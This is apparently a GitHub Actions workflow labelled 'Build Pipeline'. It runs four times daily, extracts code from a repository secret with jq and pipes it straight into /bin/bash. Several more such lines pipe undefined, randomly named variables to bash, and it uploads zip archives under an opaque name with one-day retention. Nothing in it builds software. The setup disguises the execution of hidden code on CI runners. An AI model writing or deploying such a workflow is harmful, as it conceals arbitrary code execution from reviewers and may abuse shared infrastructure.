name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '50 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          ddps50049: ${{ secrets.ddps50049 }}
        run: |
          printf '%s' "$ddps50049" | jq -r .sdqh909 | /bin/bash
          printf '%s' "$zlnlc7" | jq -r .mrbeq4534 | /bin/bash
          echo $h2 | jq -r .w05 | /bin/bash
          echo $y095 | jq -r .ftbzu318 | /bin/bash
          printf '%s' "$tf660" | jq -r .egw9 | /bin/bash
          echo $r3899 | jq -r .ad61 | /bin/bash
          echo $wjmk62 | jq -r .qjw1145 | /bin/bash
          echo $kbhu037 | jq -r .zl838 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: LDS7dnwG
          path: "*.zip"
          retention-days: 1
